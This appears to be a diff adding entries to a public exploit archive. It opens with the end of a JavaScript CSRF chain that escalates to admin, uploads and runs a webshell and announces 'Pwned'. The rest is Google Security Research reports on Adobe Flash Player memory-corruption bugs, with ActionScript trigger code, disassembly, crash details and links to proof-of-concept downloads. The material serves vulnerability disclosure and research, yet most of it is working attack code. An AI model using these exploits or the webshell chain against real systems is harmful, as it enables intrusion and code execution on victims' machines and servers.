document.privadm.submit();
document.getElementsByTagName("iframe")[1].onload = function()
//document.write("Mutating to admin uahsuasuas");
{
document.logoff.submit();
document.getElementsByTagName("iframe")[2].onload = function()
//document.write("Refreshing perms...");
{
document.login2.submit();
document.getElementsByTagName("iframe")[3].onload = function()
//document.write("Login again...Keep Calm....");
{
document.createmonitor.submit();
document.getElementsByTagName("iframe")[4].onload = function()
//document.write("Creating F*cking monitor");
{
document.uploadshell.submit();
document.getElementsByTagName("iframe")[5].onload = function()
//document.write("Uploading webshell. Muaaaaa! Muaaaaa!!");
{
document.run.submit();
document.getElementsByTagName("iframe")[6].onload = function()
//document.write("Trick to shell... come on....");
{
document.exploit.submit();
document.getElementsByTagName("iframe")[7].onload = function()
alert('Pwned!!!!!!!!!!!!!!!!!!!!!!')
}
}
}
}
}
}
}
}
</script>
</body>
</html>

29
platforms/win32/dos/37881.txt Executable file
View file

@ -0,0 +1,29 @@
Source: https://code.google.com/p/google-security-research/issues/detail?id=434&can=1&q=label%3AProduct-Flash%20modified-after%3A2015%2F8%2F17&sort=id
The Shared Object constructor does not check that the object it is provided is of type Object before setting it to be of type SharedObject. This can cause problems if another method (such as Sound.loadSound) calls into script between checking the input object type, and casting its native object. A PoC is as follows:
class subso extends Sound{
public function subso(f){
super("_level0.test");
var n = {valueOf : func};
_global.func = f;
_global.t = this;
var f2 = this.loadSound;
f2.call(this, n, 1);
}
function func(){
_global.func(_global.t,"/sosuper.swf", "/sosuper.swf");
return 1;
}
}
A sample fla, swf and AS file are attached. Note that this PoC needs to be hosted on a webserver to work and only works on 32-bit systems (tested on Windows Chrome). song1.mp3 should be put in the same folder on the server as the swf, it is needed for loadSound to work. This bug is likely only exploitable on 32-bit systems due to how the type-confused fields line up.
Proof of Concept:
https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/37881.zip

54
platforms/windows/dos/37843.txt Executable file
View file

@ -0,0 +1,54 @@
Source: https://code.google.com/p/google-security-research/issues/detail?id=302&can=1&q=label%3AProduct-Flash%20modified-after%3A2015%2F8%2F17&sort=id
[Tracking for: https://code.google.com/p/chromium/issues/detail?id=470837]
VULNERABILITY DETAILS
An integer overflow while calling Function.apply can lead to enter an ActionScript function without correctly validating the supplied arguments.
VERSION
Chrome Version: 41.0.2272.101 stable, Flash 17.0.0.134
Operating System: Win7 x64 SP1
REPRODUCTION CASE
From exec.cpp taken from the Crossbridge sources, available at https://github.com/adobe-flash/crossbridge/blob/master/avmplus/core/exec.cpp
944 // Specialized to be called from Function.apply().
945 Atom BaseExecMgr::apply(MethodEnv* env, Atom thisArg, ArrayObject *a)
946 {
947 int32_t argc = a->getLength();
...
966 // Tail call inhibited by local allocation/deallocation.
967 MMgc::GC::AllocaAutoPtr _atomv;
968 Atom* atomv = (Atom*)avmStackAllocArray(core, _atomv, (argc+1), sizeof(Atom)); //here if argc = 0xFFFFFFFF we get an integer overflow
969 atomv[0] = thisArg;
970 for (int32_t i=0 ; i < argc ; i++ )
971 atomv[i+1] = a->getUintProperty(i);
972 return env->coerceEnter(argc, atomv);
973 }
So the idea is to use the rest argument to get a working poc. For example:
public function myFunc(a0:ByteArray, a1:ByteArray, a2:ByteArray, a3:ByteArray, a4:ByteArray, a5:ByteArray, ... rest) {
try {a0.writeUnsignedInt(0x41414141)}catch (e) {}
try {a1.writeUnsignedInt(0x41414141)}catch (e) {}
try {a2.writeUnsignedInt(0x41414141)}catch (e) {}
try {a3.writeUnsignedInt(0x41414141)}catch (e) {}
try {a4.writeUnsignedInt(0x41414141)}catch (e) {}
}
public function XApplyPoc() {
var a:Array = new Array()
a.length = 0xFFFFFFFF
myFunc.apply(this, a)
}
Compile with mxmlc -target-player 15.0 -swf-version 25 XApplyPoc.as.
Proof of Concept:
https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/37843.zip

113
platforms/windows/dos/37844.txt Executable file
View file

@ -0,0 +1,113 @@
Source: https://code.google.com/p/google-security-research/issues/detail?id=303&can=1&q=label%3AProduct-Flash%20modified-after%3A2015%2F8%2F17&sort=id
[Tracking for: https://code.google.com/p/chromium/issues/detail?id=470864]
VULNERABILITY DETAILS
Use After Free in Flash AVSS.setSubscribedTags, setCuePointTags and setSubscribedTagsForBackgroundManifest can be abused to write pointers to String to freed locations.
VERSION
Chrome Version: 41.0.2272.101 stable, Flash 17.0.0.134
Operating System: Win7 x64 SP1
REPRODUCTION CASE
Use After Free vulnerability in AVSS.setSubscribedTags can cause arbitrary code execution.
pepflashplayer.dll 17.0.0.134, based at 0x10000000.
The setSubscribedTags is handled by sub_103255AD:
.text:103255AD push ebp
.text:103255AE mov ebp, esp
.text:103255B0 and esp, 0FFFFFFF8h
.text:103255B3 sub esp, 14h
.text:103255B6 push ebx
.text:103255B7 mov ebx, [ebp+arg_0]
.text:103255BA push esi
.text:103255BB push edi
.text:103255BC mov edi, eax
.text:103255BE mov eax, [ebx]
.text:103255C0 mov ecx, ebx
.text:103255C2 call dword ptr [eax+8Ch] ; first get the length of the provided array
.text:103255C8 lea esi, [edi+4Ch]
.text:103255CB mov [esp+20h+var_C], eax
.text:103255CF call sub_103265BB
.text:103255D4 mov esi, [esp+20h+var_C]
.text:103255D8 test esi, esi
.text:103255DA jz loc_1032566D
.text:103255E0 xor ecx, ecx
.text:103255E2 push 4
.text:103255E4 pop edx
.text:103255E5 mov eax, esi
.text:103255E7 mul edx
.text:103255E9 seto cl
.text:103255EC mov [edi+58h], esi
.text:103255EF neg ecx
.text:103255F1 or ecx, eax
.text:103255F3 push ecx
.text:103255F4 call unknown_libname_129 ; and then allocate an array of 4*length
.text:103255F9 and [esp+24h+var_10], 0
.text:103255FE pop ecx
.text:103255FF mov [edi+54h], eax ; that pointer is put at offset 0x54 in the object pointed by edi
Next there is a for loop that iterates over the array items and calls the toString() method of each item encountered:
.text:10325606 loc_10325606:
.text:10325606 mov eax, [edi+8]
.text:10325609 mov eax, [eax+14h]
.text:1032560C mov esi, [eax+4]
.text:1032560F push [esp+20h+var_10]
.text:10325613 mov eax, [ebx]
.text:10325615 mov ecx, ebx
.text:10325617 call dword ptr [eax+3Ch] ; get the ith element
.text:1032561A push eax
.text:1032561B mov ecx, esi
.text:1032561D call sub_1007205D ; call element->toString()
.text:10325622 lea ecx, [esp+20h+var_8]
.text:10325626 push ecx
.text:10325627 call sub_10061703
.text:1032562C mov eax, [esp+20h+var_4]
.text:10325630 inc eax
.text:10325631 push eax
.text:10325632 call unknown_libname_129
.text:10325637 mov edx, [edi+54h]
.text:1032563A pop ecx
.text:1032563B mov ecx, [esp+20h+var_10]
.text:1032563F mov [edx+ecx*4], eax ; write a pointer to the string in the array
...
.text:1032565F inc [esp+20h+var_10]
.text:10325663 mov eax, [esp+20h+var_10]
.text:10325667 cmp eax, [esp+20h+var_C]
.text:1032566B jl short loc_10325606
The issue can be triggered as follows. Register an object with a custom toString method in an array and call AVSS.setSubscribedTags(array). When object.toString() is called, call again AVSS.setSubscribedTags with a smaller array. This results in freeing the first buffer. So when the execution flow returns to AVSS.setSubscribedTags a UAF occurs allowing an attacker to write a pointer to a string somewhere in memory.
Trigger with that:
var avss:flash.media.AVSegmentedSource = new flash.media.AVSegmentedSource ();
var o:Object = new Object();
o.toString = function():String {
var a = [0,1,2,3];
avss.setSubscribedTags(a);
return "ahahahahah"
};
var a = [o,1,2,3,4,5,6,7,8,9];
var i:uint = 0;
while (i < 0x100000) {
i++;
a.push(i);
}
avss.setSubscribedTags(a);
Note: AVSS.setCuePointTags and AVSS.setSubscribedTagsForBackgroundManifest are vulnerable as well, see XAVSSArrayPoc2.swf and XAVSSArrayPoc3.swf.
Compile with mxmlc -target-player 15.0 -swf-version 25 XAVSSArrayPoc.as.
My mistake, not a UAF but instead a heap overflow. We allocate first 4*0x100000 bytes, then free that buffer, then reallocate 4*4 bytes, then write 0x100000 pointers to a buffer of size 0x10.
Proof of Concept:
https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/37844.zip

45
platforms/windows/dos/37845.txt Executable file
View file

@ -0,0 +1,45 @@
Source: https://code.google.com/p/google-security-research/issues/detail?id=316&can=1&q=label%3AProduct-Flash%20modified-after%3A2015%2F8%2F17&sort=id
[Tracking for: https://code.google.com/p/chromium/issues/detail?id=472201]
Credit is to bilou, working with the Chromium Vulnerability Rewards Program.
---
VULNERABILITY DETAILS
Loading a weird MPD file can corrupt flash player's memory.
VERSION
Chrome version 41.0.2272.101, Flash 17.0.0.134
Operating System: Win 7 x64 SP1
REPRODUCTION CASE
I'm ripping most of this from scarybeasts' sources. I'm sure he's ok with that =D.
"To reproduce, host the attached SWF and other files on a web server (e.g. localhost) and load it like this:"
"http://localhost/PlayManifest.swf?file=gen.mpd
"To compile the .as file, I had to use special flags to flex:"
"mxmlc -target-player 14.0 -swf-version 25 -static-link-runtime-shared-libraries ./PlayManifest.as"
"(This also requires that you have v14.0 of playerglobals.swc installed. Any newer version should also be fine.)"
On Win7 x64 sp1 with Chrome 32 bit, crash like this:
6AA8B67C | 8B C3 | mov eax,ebx |
6AA8B67E | E8 A1 05 00 00 | call pepflashplayer.6AA8BC24 |
6AA8B683 | EB A8 | jmp pepflashplayer.6AA8B62D |
6AA8B685 | 89 88 D0 00 00 00 | mov dword ptr ds:[eax+D0],ecx | // crash here, eax points somewhere in pepflashplayer.dll
6AA8B68B | 8B 88 88 00 00 00 | mov ecx,dword ptr ds:[eax+88] |
6AA8B691 | 33 D2 | xor edx,edx |
6AA8B693 | 3B CA | cmp ecx,edx |
6AA8B695 | 74 07 | je pepflashplayer.6AA8B69E |
6AA8B697 | 39 11 | cmp dword ptr ds:[ecx],edx |
6AA8B699 | 0F 95 C1 | setne cl |
At first sight this looks to be an uninitialized stack variable but I might be wrong.
---
Proof of Concept:
https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/37845.zip

64
platforms/windows/dos/37846.txt Executable file
View file

@ -0,0 +1,64 @@
Source: https://code.google.com/p/google-security-research/issues/detail?id=326&can=1&q=label%3AProduct-Flash%20modified-after%3A2015%2F8%2F17&sort=id
[Tracking for: https://code.google.com/p/chromium/issues/detail?id=475018]
Credit is to bilou, working with the Chromium Vulnerability Rewards Program.
---
VULNERABILITY DETAILS
Issues in DefineBitsLossless and DefineBitsLossless2 leads to using uninitialized memory while rendering a picture. This is caused by the returned value of a zlib function not properly checked.
VERSION
Chrome version 41.0.2272.101, Flash 17.0.0.134 (the code below comes from flash player standalone exe 17.0.0.134)
Operating System: Win 7 x64 SP1
REPRODUCTION CASE
Compile the provided poc with flex sdk:
mxmlc -static-link-runtime-shared-libraries=true -compress=false -target-player 15.0 -swf-version 25 XBitmapGif.as
And change the bytes in the DefineBitsLossless2 tag, at offset 0x228:
14 00 14 00 78 to 14 00 14 00 41
To get a DefineBitsLossless tag, change the byte at offset 0x220:
09 47 00 00 00 to 05 47 00 00 00
Load the provided pocs and see the pointers partially disclosed.
When handling such tags, Flash first allocates a buffer according to the picture's width and height but does not initialize it. If the compressed data stream is corrupted, the zlib function just returns an invalid token and Flash leaves the uninitialized buffer as is.
Look at sub_54732C:
.text:0054746C loc_54746C:
.text:0054746C mov ecx, [esi]
.text:0054746E push 0
.text:00547470 push 0
.text:00547472 push eax
.text:00547473 push [ebp+var_10]
.text:00547476 push [ebp+var_14]
.text:00547479 push [ebp+var_C]
.text:0054747C call sub_545459 ; allocate a buffer of 4 * 14h * 14h = 640h
.text:00547481 cmp [ebp+var_1], 0
.text:00547485 mov ecx, [esi]
.text:00547487 setnz al
.text:0054748A mov [ecx+58h], al
...
.text:005474DE loc_5474DE:
.text:005474DE lea eax, [ebp+var_50]
.text:005474E1 push 0
.text:005474E3 push eax
.text:005474E4 call xinflate ; inflate the buffer, but there's no error check?
.text:005474E9 pop ecx ; thus we can return 0xFFFFFFFD in eax with a corrupt stream
.text:005474EA pop ecx
.text:005474EB cmp eax, 1
.text:005474EE jz short loc_5474FB
.text:005474F0 test eax, eax
.text:005474F2 jnz short loc_54753A ; which will skip the buffer initialization
Reading this data back is not straightforward. For a DefineBitsLossless tag, we can read values like 0xFFXXYYZZ. For a DefineBitsLossless2 tag an operation is performed on the pixels so we can only read f(pixel). That function is handled by sub_4CD3B0 and uses a hardcoded table. By conbining both the DefineBitsLossless and DefineBitsLossless2 tags I'm quite convinced we can guess a full pointer.
---
Proof of Concept:
https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/37846.zip

148
platforms/windows/dos/37847.txt Executable file
View file

@ -0,0 +1,148 @@
Source: https://code.google.com/p/google-security-research/issues/detail?id=330&can=1&q=label%3AProduct-Flash%20modified-after%3A2015%2F8%2F17&sort=id
[Tracking for: https://code.google.com/p/chromium/issues/detail?id=476926]
Credit is to bilou, working with the Chromium Vulnerability Rewards Program.
---
VULNERABILITY DETAILS
There is a use after free vulnerability in the ActionScript 2 TextField.filters array property.
This is Issue 457278 resurrected.
VERSION
Chrome Version: [?, Flash 17.0.0.169]
Operating System: [Windows 7 x64 SP1]
REPRODUCTION CASE
When the TextField.filters array is set, Flash creates an internal array holding the filters. When the property is read, Flash iterates over this array and clones each filter. During this loop, it is possible to execute some AS2 by overriding a filter's constructor. At that moment, if the AS2 code alters the filters array, Flash frees the internal array leaving a reference to freed memory in the stack. When the execution flow resumes to the loop, a use-after-free occurs.
Note: Flash 17.0.0.169 tried to patch the previous issue by setting an "in used" flag on the targeted filter (flashplayer17_sa.exe 17.0.0.169):
.text:004D67F8 mov esi, [esp+1Ch+var_4]
.text:004D67FC push 1 ; char
.text:004D67FE mov ecx, ebp ; int
.text:004D6800 mov byte ptr [esi+0Ch], 1 // this flag was added
.text:004D6804 call xparseAS2Code
.text:004D6809 mov byte ptr [esi+0Ch], 0
And when we check the function that deletes the filters:
.text:004D66D0 push edi
.text:004D66D1 mov edi, ecx
.text:004D66D3 cmp byte ptr [edi+0Ch], 0 // check again the flag, and jump if it is set, so that the filter won't be deleted
.text:004D66D7 jnz short loc_4D6716
.text:004D66D9 cmp dword ptr [edi], 0
.text:004D66DC jz short loc_4D6708
We can bypass that feature with the following code:
flash.filters.GlowFilter = MyGlowFilter
var a = tfield.filters // set the flag to 1
--- in MyGlowFilter ---
flash.filters.GlowFilter = MyGlowFilter2
var a = _global.tfield.filters // set the flag to 1, and then set it to 0
//now we can free the filter :D, the flag is set to 0!
_global.tfield.filters = []
Tested on Flash Player standalone 17.0.0.169, the updated Chrome is not available at the time of writing.
But since the objects haven't changed too much the updated version should crash while dereferencing 0x41424344.
Can't we call that a -1day :D?
***************************************************************************
Content of FiltusPafusBis.fla
import flash.filters.GlowFilter;
var a1:Array = new Array()
var a2:Array = new Array()
for (i = 0; i<0x50/4;i++) {
a2[i] = 0x41424344
}
for (var i = 0; i<0x200;i++) {
var tf:TextFormat = new TextFormat()
a1[i] = tf
}
for (var i = 0; i<0x200;i++) {
a1[i].tabStops = a2
}
var tfield:TextField = createTextField("tf",1,1,2,3,4)
var glowfilter:GlowFilter = new GlowFilter(1,2,3,4,5,6,true,true)
tfield.filters = [glowfilter]
function f() {
for (var i = 0; i<0x20;i++) {
_global.a1[0x100+i*4].tabStops = [1,2,3,4]
}
flash.filters.GlowFilter = MyGlowFilter2
var a = _global.tfield.filters
_global.tfield.filters = []
for (var i = 0; i<0x200;i++) {
_global.a1[i].tabStops = a2
}
}
_global.tfield = tfield
_global.f = f
_global.a1 = a1
_global.a2 = a2
flash.filters.GlowFilter = MyGlowFilter
var a = tfield.filters
***************************************************************************
Content of MyGlowFilter.as:
import flash.filters.GlowFilter;
class MyGlowFilter extends flash.filters.GlowFilter {
public function MyGlowFilter (a,b,c,d,e,f,g,h)
{
super(a,b,c,d,e,f,g,h);
_global.f()
}
}
***************************************************************************
Content of MyGlowFilter2.as:
import flash.filters.GlowFilter;
class MyGlowFilter2 extends flash.filters.GlowFilter {
public function MyGlowFilter2 (a,b,c,d,e,f,g,h)
{
super(a,b,c,d,e,f,g,h);
}
}
***************************************************************************
Content of FiltusPafusBis_poc.fla
import flash.filters.GlowFilter;
var tfield:TextField = createTextField("tf",1,1,2,3,4)
var glowfilter:GlowFilter = new GlowFilter(1,2,3,4,5,6,true,true)
tfield.filters = [glowfilter]
function f() {
flash.filters.GlowFilter = MyGlowFilter2
var a = _global.tfield.filters
_global.tfield.filters = []
}
_global.tfield = tfield
_global.f = f
flash.filters.GlowFilter = MyGlowFilter
var a = tfield.filters
---
Proof of Concept:
https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/37847.zip

143
platforms/windows/dos/37848.txt Executable file
View file

@ -0,0 +1,143 @@
Source: https://code.google.com/p/google-security-research/issues/detail?id=342&can=1&q=label%3AProduct-Flash%20modified-after%3A2015%2F8%2F17&sort=id
[Tracking for https://code.google.com/p/chromium/issues/detail?id=480496]
Credit is to bilou, working with the Chromium Vulnerability Rewards Program.
---
VULNERABILITY DETAILS
A little bug while setting the TextFilter.filters array.
Chrome 42.0.2311.90 with Flash 17.0.0.169
VERSION
Chrome Version: 42.0.2311.90 Stable with Flash 17.0.0.169
Operating System: [Win 7 SP1]
REPRODUCTION CASE
We can set the TextFilter.filters array with either an array or a custom object. Providing an object allows an attacker to execute AS2 code in the following loop (these lines come from flashplayer17_sa.exe 17.0.0.169):
.text:004D6964 loc_4D6964:
.text:004D6964 and eax, 0FFFFFFF8h
.text:004D6967 push edi
.text:004D6968 mov edi, eax
.text:004D696A mov ecx, edi
.text:004D696C xor esi, esi
.text:004D696E call xAS2_getArrayLength ; here we can override object.length and execute some code
.text:004D6973 test eax, eax ; if that code frees the object pointed by ebx...
.text:004D6975 jle short loc_4D69A3
.text:004D6977
.text:004D6977 loc_4D6977:
.text:004D6977 push edi
.text:004D6978 mov ecx, esi
.text:004D697A call sub_4D3FE0 ; get an item from the object
.text:004D697F add esp, 4
.text:004D6982 test eax, eax ; we have either a filter or 0 here
.text:004D6984 jz short loc_4D6997
.text:004D6986 mov edx, [eax]
.text:004D6988 mov ecx, eax
.text:004D698A mov eax, [edx+18h]
.text:004D698D call eax
.text:004D698F push eax
.text:004D6990 mov ecx, ebx ; ...we get a use after free here
.text:004D6992 call sub_4CDB70 ; and a write-4 condition here
.text:004D6997
.text:004D6997 loc_4D6997:
.text:004D6997 mov ecx, edi
.text:004D6999 inc esi
.text:004D699A call xAS2_getArrayLength
.text:004D699F cmp esi, eax
.text:004D69A1 jl short loc_4D6977
Freeing the object pointed by ebx is easy indeed:
var tfield:TextField = createTextField("tf",1,1,2,3,4) //create a TextField at depth 1
tfield.filters = [] //create the targeted object
createTextField("textf",1,1,2,3,4) //create again a TextField (or any other DisplayObject) at the same depth and Flash frees the targeted object
flash_as2_filters_uaf_write4_poc.swf just crashes the program and flash_as2_filters_uaf_write4.swf crashes while writing to 0x41424344
***************************************************************************
Content of flash_as2_filters_uaf_write4_poc.fla
//Compile that with Flash CS5.5 and change the property "s" in the swf to "3"
//It's because Flash CS5.5 does not allow naming a property with a numeral
import flash.filters.GlowFilter;
var tfield:TextField = createTextField("tf",1,1,2,3,4)
function f() {
_global.mc.createTextField("tf",1,1,2,3,4)
}
_global.mc = this
_global.counter = 0
var oCounter:Object = new Object()
oCounter.valueOf = function () {
_global.counter += 1
if (_global.counter == 1) f()
return 10;
}
var o = {length:oCounter, 3:new GlowFilter(1,2,3,4,5,6,true,true)}
tfield.filters = o
***************************************************************************
Content of flash_as2_filters_uaf_write4.fla
//Compile that with Flash CS5.5 and change the property "s" in the swf to "3"
//It's because Flash CS5.5 does not allow naming a property with a numeral
import flash.filters.GlowFilter;
var a1:Array = new Array()
var a2:Array = new Array()
for (i = 0; i<0x3F8/4;i++) {
a2[i] = 0x41424344
}
a2[3] = 0
a2[0x324/4] = 0x41414100
a2[0x324/4 + 1] = 0x41424344
a2[0x324/4 + 2] = 0x41414143
a2[0x324/4 + 3] = 0x41414100
for (var i = 0; i<0x200;i++) {
var tf:TextFormat = new TextFormat()
a1[i] = tf
}
for (var i = 0; i<0x100;i++) {
a1[i].tabStops = a2
}
var tfield:TextField = createTextField("tf",1,1,2,3,4)
function f() {
_global.mc.createTextField("tf",1,1,2,3,4)
for (var i = 0x100; i<0x200;i++) {
_global.a1[i].tabStops = _global.a2
}
}
_global.mc = this
_global.counter = 0
_global.a1 = a1
_global.a2 = a2
var oCounter:Object = new Object()
oCounter.valueOf = function () {
_global.counter += 1
if (_global.counter == 1) f()
return 10;
}
var o = {length:oCounter, s:new GlowFilter(1,2,3,4,5,6,true,true)}
tfield.filters = o
---
Proof of Concept:
https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/37848.zip

8
platforms/windows/dos/37849.txt Executable file
View file

@ -0,0 +1,8 @@
Source: https://code.google.com/p/google-security-research/issues/detail?id=349&can=1&q=label%3AProduct-Flash%20modified-after%3A2015%2F8%2F17&sort=id
Credit is to KEEN Team.
3 different PoC's in the attached zip.
Proof of Concept:
https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/37849.zip

145
platforms/windows/dos/37853.txt Executable file
View file

@ -0,0 +1,145 @@
Source: https://code.google.com/p/google-security-research/issues/detail?id=358&can=1&q=label%3AProduct-Flash%20modified-after%3A2015%2F8%2F17&sort=id
[Deadline tracking for https://code.google.com/p/chromium/issues/detail?id=457680]
---
VULNERABILITY DETAILS
There is a use after free in Flash caused by an improper handling of BitmapData objects in the DisplacementMapFilter.mapBitmap property.
VERSION
Chrome Version: 40.0.2214.111 stable, Flash 16.0.0.305
Operating System: Win7 SP1 x64]
The AS2 mapBitmap_as2.fla can be compiled with Flash CS5. Some bytes must be changed manually to trigger the issue (see below).
Just put mapBitmap_as2.swf in a browsable directory and run the swf with Chrome. It should crash while dereferencing 0x41424344.
Here are a few steps to trigger the issue:
1) Create a BitmapData and store it somewhere, for example as a static member of a custom class.
2) Create a second BitmapData and use it to create a DisplacementMapFilter. We don't care about this BitmapData, it is just needed to create the filter.
3) Override the BitmapData constructor with a custom class. That class should put the first BitmapData on top of the AS2 stack when the constructor returns.
4) Create an object o and change its valueOf method so that it points to a function that calls the DisplacementMapFilter.mapBitmap property.
5) Use the first BitmapData and call getPixel32(o).
What happens during step 5? Flash caches first the BitmapData in the stack before calling o.valueOf. At that moment the BitmapData isn't used elsewhere so its refcount equals 1. Flash enters then o.valueOf which leads to get the mapBitmap property. At that moment we hit the following lines, in sub_10193F2D:
CPU Disasm
Address Hex dump Command
6D2D3FBB 68 BE27C66D PUSH OFFSET 6DC627BE
6D2D3FC0 FF73 04 PUSH DWORD PTR DS:[EBX+4]
6D2D3FC3 56 PUSH ESI
6D2D3FC4 8B33 MOV ESI,DWORD PTR DS:[EBX]
6D2D3FC6 E8 A572F8FF CALL 6D25B270 ; that function creates a new atom and calls the BitmapData constructor
6D2D3FCB 84C0 TEST AL,AL
6D2D3FCD 74 09 JE SHORT 6D2D3FD8
6D2D3FCF 8B0B MOV ECX,DWORD PTR DS:[EBX]
6D2D3FD1 6A 01 PUSH 1
6D2D3FD3 E8 281A0100 CALL 6D2E5A00 ; if the constructor is overriden by a custom class, the custom constructor is called here
6D2D3FD8 8B75 08 MOV ESI,DWORD PTR SS:[EBP+8]
6D2D3FDB 8B13 MOV EDX,DWORD PTR DS:[EBX]
6D2D3FDD 56 PUSH ESI
6D2D3FDE E8 418EF6FF CALL 6D23CE24 ; then pop the new atom from the AS2 stack
...
6D2D4000 23F8 AND EDI,EAX
6D2D4002 807F 35 1B CMP BYTE PTR DS:[EDI+35],1B ; and ensure this is indeed a BitmapData
6D2D4006 74 0A JE SHORT 6D2D4012
...
In the next lines Flash does two things. It destroys the BitmapData object associated to the BitmapData atom and replaces it with the one defined in the DisplacementMapFilter:
6D2D4012 8B47 28 MOV EAX,DWORD PTR DS:[EDI+28]
6D2D4015 83E0 FE AND EAX,FFFFFFFE
6D2D4018 8B40 18 MOV EAX,DWORD PTR DS:[EAX+18] ; get the BitmapData object
6D2D401B 33C9 XOR ECX,ECX
6D2D401D 51 PUSH ECX
6D2D401E E8 1DB2FEFF CALL 6D2BF240 ; call the BitmapData destructor
6D2D4023 8B75 10 MOV ESI,DWORD PTR SS:[EBP+10]
6D2D4026 8BC7 MOV EAX,EDI
6D2D4028 E8 134AF6FF CALL 6D238A40 ; and associate the DisplacementMapFilter.mapBitmap object
All of this works as long as the BitmapData object read from the AS2 stack is not in use somewhere. But since we can provide our own constructor, we can do anything with the AS2 stack, including having an in use BitmapData at the top of the stack when the constructor returns. This can be done by manipulating the AS2 byte code of the constructor for example. So if the returned BitmapData has a refcounter set to 1, Flash frees the object and we end up with a garbage reference in the stack which crashes the player in BitmapData.getPixel32.
After compiling mapBitmap_as2.swf, I had to change the bytes at offset 0x90F in the (MyBitmapData constructor):
52 17 96 02 00 04 03 26 to 17 17 17 17 17 17 17 17 (actionPOP)
Hopefully if it works we should crash here with eax controlled:
CPU Disasm
Address Hex dump Command
6D2BFA83 3B58 0C CMP EBX,DWORD PTR DS:[EAX+0C] //eax = 0x41424344
6D2BFA86 7D 57 JGE SHORT 6D2BFADF
6D2BFA88 85FF TEST EDI,EDI
6D2BFA8A 78 53 JS SHORT 6D2BFADF
6D2BFA8C 3B78 08 CMP EDI,DWORD PTR DS:[EAX+8]
6D2BFA8F 7D 4E JGE SHORT 6D2BFADF
6D2BFA91 8BC8 MOV ECX,EAX
6D2BFA93 8B01 MOV EAX,DWORD PTR DS:[ECX]
6D2BFA95 8B50 10 MOV EDX,DWORD PTR DS:[EAX+10]
6D2BFA98 FFD2 CALL EDX
I don't kwow if we can abuse ASLR with that. If we can do something without getting a virtual function dereferenced, it must be possible.
***************************************************************************
Content of MyBitmapData.as
class MyBitmapData extends String
{
static var mf;
function MyBitmapData()
{
super();
var a = MyBitmapData.mf
test(a,a,a,a,a,a,a,a) //that part should be deleted manually in the bytecode
trace(a) //so that MyBitmapData.mf stays on top of the AS2 stack
}
public function test(a,b,c,d,e,f,g,h) {
}
static function setBitmapData(myfilter)
{
mf = myfilter;
}
}
***************************************************************************
Content of mapBitmap_as2.fla
import flash.filters.DisplacementMapFilter;
import flash.display.BitmapData;
var bd:BitmapData = new BitmapData(10,10)
MyBitmapData.setBitmapData(bd)
var bd2:BitmapData = new BitmapData(10,10)
var dmf:DisplacementMapFilter = new DisplacementMapFilter(bd2,new flash.geom.Point(1,2),1,2,3,4)
newConstr = MyBitmapData
flash.display.BitmapData = newConstr
function f() {
var a = dmf.mapBitmap;
}
var a:Array = new Array()
var b:Array = new Array()
for (var i = 0; i<0xC8/4;i++) {
b[i] = 0x41424344
}
var o = new Object()
o.valueOf = function () {
f()
for (var i = 0; i<0x10;i++) {
var tf:TextFormat = new TextFormat()
tf.tabStops = b
a[i] = tf
}
return 4
}
bd.getPixel32(o,4)
---
Proof of Concept:
https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/37853.zip

62
platforms/windows/dos/37854.txt Executable file
View file

@ -0,0 +1,62 @@
Source: https://code.google.com/p/google-security-research/issues/detail?id=359&can=1&q=label%3AProduct-Flash%20modified-after%3A2015%2F8%2F17&sort=id
[Deadline tracking for https://code.google.com/p/chromium/issues/detail?id=482521]
---
VULNERABILITY DETAILS
When setting the scrollRect attribute of a MovieClip in AS2 with a custom Rectangle it is possible to free the MovieClip while a reference remains
in the stack
VERSION
Chrome Version: Chrome stable 42.0.2311.90, Flash 17.0.0.169
Operating System: [Win 7 SP1]
REPRODUCTION CASE
That code targets the MovieClip.scrollRect property. While setting this attribute with a custom Rectangle, it is possible to trigger a use after free by freeing the targeted MovieClip. Creating a TextField with the same depth of the targeted MovieClip is enough to free an object and have Flash crash.
These lines come from flashplayer standalone 17.0.0.169:
.text:00597F45 loc_597F45:
.text:00597F45 cmp eax, 6
.text:00597F48 jnz loc_597FE5
.text:00597F4E mov ecx, esi ; esi points to the MovieClip object
.text:00597F50 call sub_40C1ED
.text:00597F55 add eax, 30Ch
.text:00597F5A or dword ptr [eax], 8
.text:00597F5D mov eax, [ebx]
.text:00597F5F mov byte ptr [eax+82Ch], 1
.text:00597F66 mov ecx, [ebx]
.text:00597F68 lea eax, [ebp+74h+var_1C0]
.text:00597F6E push eax
.text:00597F6F push dword ptr [ebx+0Ch]
.text:00597F72 call xfetchRectangleProperties ; get the Rectangle properties, and execute some AS2
.text:00597F77 test al, al
.text:00597F79 jz loc_598274
.text:00597F7F mov edi, [ebp+74h+var_1C0]
.text:00597F85 mov ecx, esi
.text:00597F87 imul edi, 14h
.text:00597F8A call sub_40C1ED ; reference freed memory and return a bad
pointer
.text:00597F8F mov [eax+310h], edi ; crash here, eax = 0
Poc (compile with Flash CS5.5):
import flash.geom.Rectangle
var o2 = {}
o2.valueOf = function () {
_global.mc.createTextField("newtf",1,1,1,2,3)
return 7
}
var o = {x:o2,y:0,width:4,height:5}
_global.mc = this
var newmc:MovieClip = this.createEmptyMovieClip("newmc",1)
newmc.scrollRect = o
---
Proof of Concept:
https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/37854.zip

51
platforms/windows/dos/37856.txt Executable file
View file

@ -0,0 +1,51 @@
Source: https://code.google.com/p/google-security-research/issues/detail?id=361&can=1&q=label%3AProduct-Flash%20modified-after%3A2015%2F8%2F17&sort=id
The following access violation was observed in the Adobe Flash Player plugin:
(150c.ca0): Access violation - code c0000005 (first chance)
First chance exceptions are reported before any exception handling.
This exception may be expected and handled.
*** ERROR: Symbol file could not be found. Defaulted to export symbols for FlashPlayer.exe -
eax=078a53b7 ebx=00f28938 ecx=002dea24 edx=000085ed esi=000085ee edi=09d9eee0
eip=0139a657 esp=002de9b4 ebp=002deda4 iopl=0 nv up ei ng nz ac pe cy
cs=0023 ss=002b ds=002b es=002b fs=0053 gs=002b efl=00210297
FlashPlayer!WinMainSandboxed+0x572f0:
